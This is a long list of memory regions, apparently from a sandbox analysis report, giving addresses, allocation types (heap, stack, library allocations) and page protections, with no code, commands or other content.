4679EFF000
|
stack
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
53F427F000
|
stack
|
page read and write
|
||
|
23263F50000
|
trusted library allocation
|
page read and write
|
||
|
C000174000
|
direct allocation
|
page read and write
|
||
|
1F8C0408000
|
heap
|
page read and write
|
||
|
234B40DC000
|
heap
|
page read and write
|
||
|
7FF848E3B000
|
trusted library allocation
|
page read and write
|
||
|
2349C8AF000
|
trusted library allocation
|
page read and write
|
||
|
45EDBFF000
|
stack
|
page read and write
|
||
|
1E8030E0000
|
heap
|
page read and write
|
||
|
3C3D6FE000
|
stack
|
page read and write
|
||
|
25390BD0000
|
heap
|
page read and write
|
||
|
19A1F745000
|
heap
|
page read and write
|
||
|
1F8C0413000
|
heap
|
page read and write
|
||
|
23264090000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024F000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
23DBAFA0000
|
heap
|
page read and write
|
||
|
13FBB9F0000
|
heap
|
page read and write
|
||
|
1F8C0419000
|
heap
|
page read and write
|
||
|
234B40C8000
|
heap
|
page read and write
|
||
|
1F0BD936000
|
heap
|
page read and write
|
||
|
25D72125000
|
heap
|
page read and write
|
||
|
1F8C5A32000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0288000
|
heap
|
page read and write
|
||
|
1EE68ED0000
|
trusted library allocation
|
page read and write
|
||
|
2BB89615000
|
trusted library allocation
|
page read and write
|
||
|
7FF849122000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0470000
|
heap
|
page read and write
|
||
|
C2138C000
|
stack
|
page read and write
|
||
|
2F253FE000
|
stack
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
23264254000
|
heap
|
page read and write
|
||
|
13FA3305000
|
heap
|
page read and write
|
||
|
C0002A8000
|
direct allocation
|
page read and write
|
||
|
25D00E92000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0462000
|
heap
|
page read and write
|
||
|
1E25B231000
|
heap
|
page read and write
|
||
|
1F0BD92E000
|
heap
|
page read and write
|
||
|
AE1137E000
|
stack
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
13FBB922000
|
heap
|
page read and write
|
||
|
23499DE5000
|
heap
|
page read and write
|
||
|
1F8C024E000
|
heap
|
page read and write
|
||
|
C000049000
|
direct allocation
|
page read and write
|
||
|
23499D3A000
|
heap
|
page read and write
|
||
|
13FBBC10000
|
heap
|
page read and write
|
||
|
132F000
|
unkown
|
page write copy
|
||
|
D94AA7D000
|
stack
|
page read and write
|
||
|
E77A9EE000
|
stack
|
page read and write
|
||
|
1F0BDA10000
|
heap
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
1913F850000
|
heap
|
page read and write
|
||
|
1F8C023F000
|
heap
|
page read and write
|
||
|
2325EB13000
|
heap
|
page read and write
|
||
|
9A371ED000
|
stack
|
page read and write
|
||
|
1004FF000
|
stack
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
234B3E3E000
|
heap
|
page read and write
|
||
|
13FBBC28000
|
heap
|
page read and write
|
||
|
C00015C000
|
direct allocation
|
page read and write
|
||
|
7FF848F06000
|
trusted library allocation
|
page execute and read and write
|
||
|
234B3E44000
|
heap
|
page read and write
|
||
|
7FF848FC2000
|
trusted library allocation
|
page read and write
|
||
|
25D72240000
|
heap
|
page execute and read and write
|
||
|
13FA3680000
|
heap
|
page execute and read and write
|
||
|
1F8C0242000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
1F0BF1E0000
|
heap
|
page read and write
|
||
|
1F8C03C0000
|
heap
|
page read and write
|
||
|
1F8C5A60000
|
trusted library allocation
|
page read and write
|
||
|
1F8C03E1000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
23263F70000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
2325EAA3000
|
heap
|
page read and write
|
||
|
12F3000
|
unkown
|
page write copy
|
||
|
13FA18E4000
|
heap
|
page read and write
|
||
|
2BB85440000
|
heap
|
page read and write
|
||
|
1F8C0241000
|
heap
|
page read and write
|
||
|
D94A87E000
|
stack
|
page read and write
|
||
|
1F8C03CA000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
1F0BD92B000
|
heap
|
page read and write
|
||
|
1E25B3F5000
|
heap
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
7FF848EDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C0438000
|
heap
|
page read and write
|
||
|
1EE712A0000
|
heap
|
page execute and read and write
|
||
|
1F8C0206000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
13FBBB52000
|
heap
|
page read and write
|
||
|
1F8C03C9000
|
heap
|
page read and write
|
||
|
2326421D000
|
heap
|
page read and write
|
||
|
DFF000
|
unkown
|
page readonly
|
||
|
19A2D131000
|
heap
|
page read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
25D72596000
|
heap
|
page read and write
|
||
|
2325E9C0000
|
trusted library section
|
page read and write
|
||
|
1F7ABE10000
|
heap
|
page read and write
|
||
|
2325E970000
|
heap
|
page read and write
|
||
|
1F8C0205000
|
heap
|
page read and write
|
||
|
C000290000
|
direct allocation
|
page read and write
|
||
|
1E8578E0000
|
heap
|
page read and write
|
||
|
2338C033000
|
heap
|
page read and write
|
||
|
7FF849270000
|
trusted library allocation
|
page read and write
|
||
|
C000292000
|
direct allocation
|
page read and write
|
||
|
C000128000
|
direct allocation
|
page read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
53F417E000
|
stack
|
page read and write
|
||
|
1F8C0457000
|
heap
|
page read and write
|
||
|
361BB5E000
|
stack
|
page read and write
|
||
|
7FF848FD5000
|
trusted library allocation
|
page read and write
|
||
|
1F0BD8B5000
|
heap
|
page read and write
|
||
|
7FF849183000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
AE110FE000
|
unkown
|
page readonly
|
||
|
234B3E32000
|
heap
|
page read and write
|
||
|
232640D0000
|
remote allocation
|
page read and write
|
||
|
AE10EFE000
|
unkown
|
page readonly
|
||
|
19A2D0F0000
|
heap
|
page read and write
|
||
|
2349C1BC000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
CA8417C000
|
stack
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
C00008C000
|
direct allocation
|
page read and write
|
||
|
1F8C5AC0000
|
trusted library allocation
|
page read and write
|
||
|
15FB3230000
|
heap
|
page read and write
|
||
|
25D010D1000
|
trusted library allocation
|
page read and write
|
||
|
25D01919000
|
trusted library allocation
|
page read and write
|
||
|
2F252FC000
|
stack
|
page read and write
|
||
|
1F8C58C0000
|
trusted library allocation
|
page read and write
|
||
|
1330000
|
unkown
|
page read and write
|
||
|
2338C1C0000
|
heap
|
page read and write
|
||
|
1F8C5AC9000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
2466BE40000
|
heap
|
page read and write
|
||
|
19A2D0FA000
|
heap
|
page read and write
|
||
|
25D100A2000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0393000
|
heap
|
page read and write
|
||
|
13FBB872000
|
heap
|
page read and write
|
||
|
1F8C03A1000
|
heap
|
page read and write
|
||
|
7FF849230000
|
trusted library allocation
|
page execute and read and write
|
||
|
AB21FE000
|
stack
|
page read and write
|
||
|
D94ACF8000
|
stack
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
7FF849240000
|
trusted library allocation
|
page read and write
|
||
|
1EE58FD6000
|
trusted library allocation
|
page read and write
|
||
|
2325EAAB000
|
heap
|
page read and write
|
||
|
1851FA15000
|
heap
|
page read and write
|
||
|
1F8C0285000
|
heap
|
page read and write
|
||
|
7FF848ED6000
|
trusted library allocation
|
page read and write
|
||
|
1EE572A1000
|
heap
|
page read and write
|
||
|
1F8C03A1000
|
heap
|
page read and write
|
||
|
1F0BD926000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
2325F300000
|
heap
|
page read and write
|
||
|
C0000AC000
|
direct allocation
|
page read and write
|
||
|
1F8C03BE000
|
heap
|
page read and write
|
||
|
53F3F76000
|
stack
|
page read and write
|
||
|
25D100B1000
|
trusted library allocation
|
page read and write
|
||
|
2BB859CD000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
28E2B920000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
AE109FE000
|
unkown
|
page readonly
|
||
|
2325F31A000
|
heap
|
page read and write
|
||
|
1F8C0388000
|
heap
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
23263F31000
|
trusted library allocation
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
1F0BD918000
|
heap
|
page read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
2BB837A0000
|
heap
|
page read and write
|
||
|
231D63F0000
|
heap
|
page read and write
|
||
|
1F0BD6C0000
|
heap
|
page read and write
|
||
|
1F8BF6B4000
|
trusted library allocation
|
page read and write
|
||
|
1EE571A0000
|
heap
|
page read and write
|
||
|
1F8C03D8000
|
heap
|
page read and write
|
||
|
1F0BD884000
|
heap
|
page read and write
|
||
|
B88AFFE000
|
stack
|
page read and write
|
||
|
1F8C045C000
|
heap
|
page read and write
|
||
|
1F8C03BB000
|
heap
|
page read and write
|
||
|
15FB33E5000
|
heap
|
page read and write
|
||
|
1F8C0955000
|
trusted library allocation
|
page read and write
|
||
|
1F8C039A000
|
heap
|
page read and write
|
||
|
1EE58FDA000
|
trusted library allocation
|
page read and write
|
||
|
1F0BD927000
|
heap
|
page read and write
|
||
|
1EE58E70000
|
heap
|
page execute and read and write
|
||
|
C2E000
|
unkown
|
page readonly
|
||
|
2338C2F5000
|
heap
|
page read and write
|
||
|
1EE712A7000
|
heap
|
page execute and read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
22F401C0000
|
heap
|
page read and write
|
||
|
2BB86DCD000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0763000
|
heap
|
page read and write
|
||
|
1F0BD90C000
|
heap
|
page read and write
|
||
|
860000
|
unkown
|
page readonly
|
||
|
13FA4316000
|
trusted library allocation
|
page read and write
|
||
|
25D72470000
|
heap
|
page read and write
|
||
|
1000FC000
|
stack
|
page read and write
|
||
|
13FA1890000
|
trusted library allocation
|
page read and write
|
||
|
1F0BD931000
|
heap
|
page read and write
|
||
|
361BADD000
|
stack
|
page read and write
|
||
|
53F3E7E000
|
stack
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
2325E950000
|
heap
|
page read and write
|
||
|
25D00CA9000
|
trusted library allocation
|
page read and write
|
||
|
53F3FFE000
|
stack
|
page read and write
|
||
|
B88B2FB000
|
stack
|
page read and write
|
||
|
2325EA6B000
|
heap
|
page read and write
|
||
|
1F8C03B1000
|
heap
|
page read and write
|
||
|
1F8C0267000
|
heap
|
page read and write
|
||
|
25D01225000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
1F8C03DA000
|
heap
|
page read and write
|
||
|
15FB3067000
|
heap
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1077000
|
unkown
|
page readonly
|
||
|
1F0BD8E7000
|
heap
|
page read and write
|
||
|
E77AE7E000
|
stack
|
page read and write
|
||
|
DAAAB7E000
|
stack
|
page read and write
|
||
|
1F7ABE3F000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
13FA4243000
|
trusted library allocation
|
page read and write
|
||
|
2BB83966000
|
heap
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
1EE57590000
|
heap
|
page read and write
|
||
|
1EE57210000
|
heap
|
page read and write
|
||
|
1EE58FE7000
|
trusted library allocation
|
page read and write
|
||
|
199CC0BA000
|
heap
|
page read and write
|
||
|
1F8C0438000
|
heap
|
page read and write
|
||
|
1F8C5940000
|
trusted library allocation
|
page read and write
|
||
|
2338C2F0000
|
heap
|
page read and write
|
||
|
25D01598000
|
trusted library allocation
|
page read and write
|
||
|
2325EA8B000
|
heap
|
page read and write
|
||
|
1D548BE0000
|
heap
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
135C000
|
unkown
|
page read and write
|
||
|
234B3F90000
|
heap
|
page execute and read and write
|
||
|
1F8C03EC000
|
heap
|
page read and write
|
||
|
C0000D1000
|
direct allocation
|
page read and write
|
||
|
C000148000
|
direct allocation
|
page read and write
|
||
|
2338C042000
|
heap
|
page read and write
|
||
|
1F8C03C2000
|
heap
|
page read and write
|
||
|
232642EB000
|
heap
|
page read and write
|
||
|
1F8C043F000
|
heap
|
page read and write
|
||
|
1F8C028B000
|
heap
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
25D7024C000
|
heap
|
page read and write
|
||
|
2349C136000
|
trusted library allocation
|
page read and write
|
||
|
2349BDE0000
|
trusted library allocation
|
page read and write
|
||
|
C000098000
|
direct allocation
|
page read and write
|
||
|
1300000
|
unkown
|
page read and write
|
||
|
25D018AB000
|
trusted library allocation
|
page read and write
|
||
|
1328000
|
unkown
|
page write copy
|
||
|
20FEB300000
|
heap
|
page read and write
|
||
|
1F8C03D8000
|
heap
|
page read and write
|
||
|
1E8578E8000
|
heap
|
page read and write
|
||
|
7FF849154000
|
trusted library allocation
|
page read and write
|
||
|
1F8C5A00000
|
trusted library allocation
|
page read and write
|
||
|
20FEB3D8000
|
heap
|
page read and write
|
||
|
1F0BD923000
|
heap
|
page read and write
|
||
|
19A2D0C0000
|
heap
|
page read and write
|
||
|
19A2D142000
|
heap
|
page read and write
|
||
|
2325F313000
|
heap
|
page read and write
|
||
|
23499D76000
|
heap
|
page read and write
|
||
|
7FF849260000
|
trusted library allocation
|
page read and write
|
||
|
1F0BD960000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
1F0BD8F3000
|
heap
|
page read and write
|
||
|
25D012B9000
|
trusted library allocation
|
page read and write
|
||
|
1F8C03C8000
|
heap
|
page read and write
|
||
|
25D004CB000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
C2E000
|
unkown
|
page readonly
|
||
|
16486C70000
|
heap
|
page read and write
|
||
|
25D00F80000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
23263F70000
|
trusted library allocation
|
page read and write
|
||
|
FE574FE000
|
stack
|
page read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
C20073000
|
stack
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C095E000
|
trusted library allocation
|
page read and write
|
||
|
2BB83928000
|
heap
|
page read and write
|
||
|
E054BEE000
|
stack
|
page read and write
|
||
|
7FF849240000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0953000
|
trusted library allocation
|
page read and write
|
||
|
1F0BD882000
|
heap
|
page read and write
|
||
|
1F8C03C0000
|
heap
|
page read and write
|
||
|
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E803000000
|
heap
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
1F0BD934000
|
heap
|
page read and write
|
||
|
25D00001000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
7FF849210000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1851F850000
|
heap
|
page read and write
|
||
|
1F8C0261000
|
heap
|
page read and write
|
||
|
16486C00000
|
heap
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
1F8C026D000
|
heap
|
page read and write
|
||
|
25D72366000
|
heap
|
page execute and read and write
|
||
|
199CC2F5000
|
heap
|
page read and write
|
||
|
FE573FD000
|
stack
|
page read and write
|
||
|
CA8467E000
|
unkown
|
page readonly
|
||
|
1F8C5AC9000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0285000
|
heap
|
page read and write
|
||
|
1F8C03F2000
|
heap
|
page read and write
|
||
|
E05517E000
|
stack
|
page read and write
|
||
|
1F8C0261000
|
heap
|
page read and write
|
||
|
2BB83BB0000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024D000
|
heap
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FA2000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
7FF848FD1000
|
trusted library allocation
|
page read and write
|
||
|
C0002B8000
|
direct allocation
|
page read and write
|
||
|
234B3F97000
|
heap
|
page execute and read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
9D7307F000
|
stack
|
page read and write
|
||
|
E05624C000
|
stack
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
1F8C03AA000
|
heap
|
page read and write
|
||
|
26B8FC2B000
|
heap
|
page read and write
|
||
|
E054BA5000
|
stack
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
2325F940000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0239000
|
heap
|
page read and write
|
||
|
220FB420000
|
heap
|
page read and write
|
||
|
16103990000
|
heap
|
page read and write
|
||
|
13FB37D9000
|
trusted library allocation
|
page read and write
|
||
|
13FBBA30000
|
heap
|
page read and write
|
||
|
C00003C000
|
direct allocation
|
page read and write
|
||
|
DAAAAFE000
|
stack
|
page read and write
|
||
|
D63000
|
unkown
|
page readonly
|
||
|
1F8C5AC6000
|
trusted library allocation
|
page read and write
|
||
|
1EE58EB0000
|
heap
|
page read and write
|
||
|
C2053E000
|
stack
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EE58FD0000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
20FEB310000
|
heap
|
page read and write
|
||
|
1F8C03B1000
|
heap
|
page read and write
|
||
|
1F8C5AC2000
|
trusted library allocation
|
page read and write
|
||
|
234B40AC000
|
heap
|
page read and write
|
||
|
1F8C03ED000
|
heap
|
page read and write
|
||
|
1F8C0245000
|
heap
|
page read and write
|
||
|
2349C8F0000
|
trusted library allocation
|
page read and write
|
||
|
6DBED4F000
|
stack
|
page read and write
|
||
|
132A000
|
unkown
|
page write copy
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
1F7ABF20000
|
heap
|
page read and write
|
||
|
23263F60000
|
trusted library allocation
|
page read and write
|
||
|
C000156000
|
direct allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
C000076000
|
direct allocation
|
page read and write
|
||
|
139A000
|
unkown
|
page readonly
|
||
|
AE10E7E000
|
stack
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
15FB30AD000
|
heap
|
page read and write
|
||
|
AE11F7E000
|
stack
|
page read and write
|
||
|
1913DD50000
|
heap
|
page read and write
|
||
|
16486C78000
|
heap
|
page read and write
|
||
|
FE5747F000
|
stack
|
page read and write
|
||
|
25390C62000
|
heap
|
page read and write
|
||
|
1D548B40000
|
heap
|
page read and write
|
||
|
2325EABA000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C03E0000
|
heap
|
page read and write
|
||
|
7FF848EDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1B213158000
|
heap
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
25D10090000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E23000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
7FF8491F0000
|
trusted library allocation
|
page read and write
|
||
|
2349BD49000
|
trusted library allocation
|
page read and write
|
||
|
234ABD27000
|
trusted library allocation
|
page read and write
|
||
|
C0000A8000
|
direct allocation
|
page read and write
|
||
|
B88B1FF000
|
stack
|
page read and write
|
||
|
1F8C024E000
|
heap
|
page read and write
|
||
|
1F8C03FF000
|
heap
|
page read and write
|
||
|
28E2B9B8000
|
heap
|
page read and write
|
||
|
1E25B210000
|
heap
|
page read and write
|
||
|
1F8C0261000
|
heap
|
page read and write
|
||
|
28E2BD10000
|
heap
|
page read and write
|
||
|
7FF8491B8000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0258000
|
heap
|
page read and write
|
||
|
C000045000
|
direct allocation
|
page read and write
|
||
|
1F0BF1E9000
|
heap
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F8BF6A1000
|
trusted library allocation
|
page read and write
|
||
|
25D725AE000
|
heap
|
page read and write
|
||
|
23264080000
|
trusted library allocation
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
1F8C03BE000
|
heap
|
page read and write
|
||
|
25D70050000
|
heap
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
70E8DFF000
|
unkown
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
26257160000
|
heap
|
page read and write
|
||
|
2349C085000
|
trusted library allocation
|
page read and write
|
||
|
C000000000
|
direct allocation
|
page read and write
|
||
|
2325F200000
|
heap
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
CA8427E000
|
unkown
|
page readonly
|
||
|
2BB8B415000
|
trusted library allocation
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0241000
|
heap
|
page read and write
|
||
|
D94ADFF000
|
stack
|
page read and write
|
||
|
1F8C5AC3000
|
trusted library allocation
|
page read and write
|
||
|
C000082000
|
direct allocation
|
page read and write
|
||
|
1F8C023F000
|
heap
|
page read and write
|
||
|
AE106F9000
|
stack
|
page read and write
|
||
|
1F0BD8FB000
|
heap
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
7FF848E1B000
|
trusted library allocation
|
page read and write
|
||
|
1913DD05000
|
heap
|
page read and write
|
||
|
2325FB60000
|
trusted library section
|
page readonly
|
||
|
C0000B0000
|
direct allocation
|
page read and write
|
||
|
12F3000
|
unkown
|
page read and write
|
||
|
1E8579E0000
|
heap
|
page read and write
|
||
|
23264060000
|
trusted library allocation
|
page read and write
|
||
|
C000154000
|
direct allocation
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
7FF849280000
|
trusted library allocation
|
page read and write
|
||
|
AE103FE000
|
unkown
|
page readonly
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C0402000
|
heap
|
page read and write
|
||
|
1F8C0438000
|
heap
|
page read and write
|
||
|
53F40FF000
|
stack
|
page read and write
|
||
|
25D71B65000
|
heap
|
page read and write
|
||
|
6B800FF000
|
stack
|
page read and write
|
||
|
1F8BF635000
|
trusted library allocation
|
page read and write
|
||
|
1EE5732D000
|
heap
|
page read and write
|
||
|
2BB863CD000
|
trusted library allocation
|
page read and write
|
||
|
65CBFFE000
|
stack
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
1F0BD92E000
|
heap
|
page read and write
|
||
|
1F8C045F000
|
heap
|
page read and write
|
||
|
25D00FD9000
|
trusted library allocation
|
page read and write
|
||
|
25D71B20000
|
trusted library allocation
|
page read and write
|
||
|
1F8C043E000
|
heap
|
page read and write
|
||
|
DD0000
|
unkown
|
page readonly
|
||
|
25D71AD0000
|
heap
|
page read and write
|
||
|
7FF849260000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
AE113FE000
|
unkown
|
page readonly
|
||
|
C000030000
|
direct allocation
|
page read and write
|
||
|
AB20F6000
|
stack
|
page read and write
|
||
|
15FB33E0000
|
heap
|
page read and write
|
||
|
C00006A000
|
direct allocation
|
page read and write
|
||
|
19A1F550000
|
heap
|
page read and write
|
||
|
B88A51A000
|
stack
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
2349C158000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C5AC9000
|
trusted library allocation
|
page read and write
|
||
|
13FA18DE000
|
heap
|
page read and write
|
||
|
2326430E000
|
heap
|
page read and write
|
||
|
1E25B1F0000
|
heap
|
page read and write
|
||
|
19A2CFC0000
|
heap
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
23DBB2A0000
|
heap
|
page read and write
|
||
|
23499F50000
|
heap
|
page readonly
|
||
|
25D018F1000
|
trusted library allocation
|
page read and write
|
||
|
1F0BD93C000
|
heap
|
page read and write
|
||
|
6346CFE000
|
stack
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
E69000
|
unkown
|
page readonly
|
||
|
25D70253000
|
heap
|
page read and write
|
||
|
1329000
|
unkown
|
page read and write
|
||
|
C000002000
|
direct allocation
|
page read and write
|
||
|
C00009E000
|
direct allocation
|
page read and write
|
||
|
E6C000
|
unkown
|
page readonly
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1EE57450000
|
heap
|
page readonly
|
||
|
CA837DB000
|
stack
|
page read and write
|
||
|
1F0BD925000
|
heap
|
page read and write
|
||
|
45EDB7D000
|
stack
|
page read and write
|
||
|
7FF8491FA000
|
trusted library allocation
|
page read and write
|
||
|
92D6B7F000
|
stack
|
page read and write
|
||
|
13FA3200000
|
heap
|
page read and write
|
||
|
232642D0000
|
heap
|
page read and write
|
||
|
7FF848FC2000
|
trusted library allocation
|
page read and write
|
||
|
138D000
|
unkown
|
page read and write
|
||
|
1EE571B0000
|
heap
|
page read and write
|
||
|
2627CD50000
|
direct allocation
|
page read and write
|
||
|
2325EA92000
|
heap
|
page read and write
|
||
|
25D71EE0000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
7FF849243000
|
trusted library allocation
|
page read and write
|
||
|
C000072000
|
direct allocation
|
page read and write
|
||
|
1F8C0389000
|
heap
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
E77A8E3000
|
stack
|
page read and write
|
||
|
1F0BD90C000
|
heap
|
page read and write
|
||
|
1F0BD8FD000
|
heap
|
page read and write
|
||
|
15FB3030000
|
heap
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848FB1000
|
trusted library allocation
|
page read and write
|
||
|
C000130000
|
direct allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C0438000
|
heap
|
page read and write
|
||
|
7FF849133000
|
trusted library allocation
|
page read and write
|
||
|
234B40D4000
|
heap
|
page read and write
|
||
|
7FF849250000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
D94AAFD000
|
stack
|
page read and write
|
||
|
1F8C5820000
|
trusted library allocation
|
page read and write
|
||
|
AE0FD1C000
|
stack
|
page read and write
|
||
|
1F0BDA1E000
|
heap
|
page read and write
|
||
|
E77ADFE000
|
stack
|
page read and write
|
||
|
2325FEE0000
|
trusted library allocation
|
page read and write
|
||
|
B88A8FE000
|
stack
|
page read and write
|
||
|
3C3D77E000
|
stack
|
page read and write
|
||
|
2BB83880000
|
heap
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
9A374FF000
|
stack
|
page read and write
|
||
|
1F8C5AC1000
|
trusted library allocation
|
page read and write
|
||
|
1F0BF1E6000
|
heap
|
page read and write
|
||
|
D94A8FE000
|
stack
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F0BD866000
|
heap
|
page read and write
|
||
|
199CC090000
|
heap
|
page read and write
|
||
|
1F8C03F3000
|
heap
|
page read and write
|
||
|
1F0BF2CD000
|
heap
|
page read and write
|
||
|
1F0BD93D000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
2325F31A000
|
heap
|
page read and write
|
||
|
AE118FB000
|
stack
|
page read and write
|
||
|
25D00D11000
|
trusted library allocation
|
page read and write
|
||
|
53F3B8C000
|
stack
|
page read and write
|
||
|
1077000
|
unkown
|
page readonly
|
||
|
C66B6FE000
|
stack
|
page read and write
|
||
|
25390C40000
|
heap
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
